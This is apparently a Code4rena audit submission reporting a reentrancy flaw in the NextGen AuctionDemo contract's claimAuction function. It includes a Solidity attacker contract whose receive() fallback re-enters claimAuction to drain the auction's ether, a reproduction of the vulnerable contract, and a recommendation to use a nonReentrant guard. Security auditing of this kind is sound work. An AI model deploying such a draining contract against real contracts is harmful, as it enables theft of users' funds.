Platform: Code4rena
Start Date: 30/10/2023
Pot Size: $49,250 USDC
Total HM: 14
Participants: 243
Period: 14 days
Judge: 0xsomeone
Id: 302
League: ETH
Rank: 204/243
Findings: 1
Award: $0.00
🌟 Selected for report: 0
🚀 Solo Findings: 0
🌟 Selected for report: smiling_heretic
Also found by: 00decree, 00xSEV, 0x180db, 0x3b, 0x656c68616a, 0xAadi, 0xAleko, 0xAsen, 0xDetermination, 0xJuda, 0xMAKEOUTHILL, 0xMango, 0xMosh, 0xSwahili, 0x_6a70, 0xarno, 0xgrbr, 0xpiken, 0xsagetony, 3th, 8olidity, ABA, AerialRaider, Al-Qa-qa, Arabadzhiev, AvantGard, CaeraDenoir, ChrisTina, DanielArmstrong, DarkTower, DeFiHackLabs, Deft_TT, Delvir0, Draiakoo, Eigenvectors, Fulum, Greed, HChang26, Haipls, Hama, Inference, Jiamin, JohnnyTime, Jorgect, Juntao, Kaysoft, Kose, Kow, Krace, MaNcHaSsS, Madalad, MrPotatoMagic, Neon2835, NoamYakov, Norah, Oxsadeeq, PENGUN, REKCAH, Ruhum, Shubham, Silvermist, Soul22, SovaSlava, SpicyMeatball, Talfao, TermoHash, The_Kakers, Toshii, TuringConsulting, Udsen, VAD37, Vagner, Zac, Zach_166, ZdravkoHr, _eperezok, ak1, aldarion, alexfilippov314, alexxander, amaechieth, aslanbek, ast3ros, audityourcontracts, ayden, bdmcbri, bird-flu, blutorque, bronze_pickaxe, btk, c0pp3rscr3w3r, c3phas, cartlex_, cccz, ciphermarco, circlelooper, crunch, cryptothemex, cu5t0mpeo, darksnow, degensec, dethera, devival, dimulski, droptpackets, epistkr, evmboi32, fibonacci, gumgumzum, immeas, innertia, inzinko, jasonxiale, joesan, ke1caM, kimchi, lanrebayode77, lsaudit, mahyar, max10afternoon, merlin, mrudenko, nuthan2x, oakcobalt, openwide, orion, phoenixV110, pontifex, r0ck3tz, rotcivegaf, rvierdiiev, seeques, shenwilly, sl1, slvDev, t0x1c, tallo, tnquanghuy0512, tpiliposian, trachev, twcctop, vangrim, volodya, xAriextz, xeros, xuwinnie, y4y, yobiz, zhaojie
0 USDC - $0.00
https://github.com/code-423n4/2023-10-nextgen/blob/8b518196629faa37eae39736837b24926fd3c07c/hardhat/smart-contracts/AuctionDemo.sol#L113 https://github.com/code-423n4/2023-10-nextgen/blob/8b518196629faa37eae39736837b24926fd3c07c/hardhat/smart-contracts/AuctionDemo.sol#L116
Either the winner or the owner() could be a malicious smart contract with a receive() fallback function. Once claimAuction is called by either the winner or an admin, the attacker's fallback function could repeatedly invoke claimAuction until the balance of the Auction contract is depleted.
I've configured a simple attacker contract in Remix. I believe there's no need to demonstrate a proof of concept using a test file, as the process is quite straightforward.
// SPDX-License-Identifier: MIT pragma solidity 0.8.22; contract Attacker { Auction public _auction; constructor(address auction_) { _auction = Auction(auction_); } receive() external payable { if (address(_auction).balance > 1 ether) { _auction.claimAuction(1); } } function balanceOf() public view returns (uint256) { return address(this).balance; } function participiate() external payable { _auction.setAuctionInfo{value: msg.value}(); } } contract Auction { address owner; constructor() { owner = msg.sender; } // auction Bidders struct auctionInfoStru { address bidder; uint256 bid; bool status; } // mapping of collectionSecondaryAddresses struct mapping (uint256 => auctionInfoStru[]) public auctionInfoData; function setAuctionInfo() external payable { require(msg.value > returnHighestBid(1)); auctionInfoStru memory newBid = auctionInfoStru(msg.sender, msg.value, true); auctionInfoData[1].push(newBid); } function returnHighestBid(uint256 _tokenid) public view returns (uint256) { uint256 index; if (auctionInfoData[_tokenid].length > 0) { uint256 highBid = 0; for (uint256 i=0; i< auctionInfoData[_tokenid].length; i++) { if (auctionInfoData[_tokenid][i].bid > highBid && auctionInfoData[_tokenid][i].status == true) { highBid = auctionInfoData[_tokenid][i].bid; index = i; } } if (auctionInfoData[_tokenid][index].status == true) { return highBid; } else { return 0; } } else { return 0; } } function returnHighestBidder(uint256 _tokenid) public view returns (address) { uint256 highBid = 0; uint256 index; for (uint256 i=0; i< auctionInfoData[_tokenid].length; i++) { if (auctionInfoData[_tokenid][i].bid > highBid && auctionInfoData[_tokenid][i].status == true) { index = i; } } if (auctionInfoData[_tokenid][index].status == true) { return auctionInfoData[_tokenid][index].bidder; } else { revert("No Active Bidder"); } } function claimAuction(uint256 _tokenid) public { uint256 highestBid = returnHighestBid(_tokenid); address highestBidder = returnHighestBidder(_tokenid); for (uint256 i=0; i< auctionInfoData[_tokenid].length; i ++) { if (auctionInfoData[_tokenid][i].bidder == highestBidder && auctionInfoData[_tokenid][i].bid == highestBid && auctionInfoData[_tokenid][i].status == true) { (bool success, ) = payable(owner).call{value: highestBid}(""); } else if (auctionInfoData[_tokenid][i].status == true) { (bool success, ) = payable(auctionInfoData[_tokenid][i].bidder).call{value: auctionInfoData[_tokenid][i].bid}(""); } else {} } } }
Manual review, remix
use nonReentrant modifier from ReentrancyGuard of OZ/Solady/Solmate.
Reentrancy
#0 - c4-pre-sort
2023-11-20T14:16:01Z
141345 marked the issue as duplicate of #962
#1 - c4-judge
2023-12-04T21:40:14Z
alex-ppg marked the issue as duplicate of #1323
#2 - c4-judge
2023-12-08T18:18:02Z
alex-ppg marked the issue as partial-25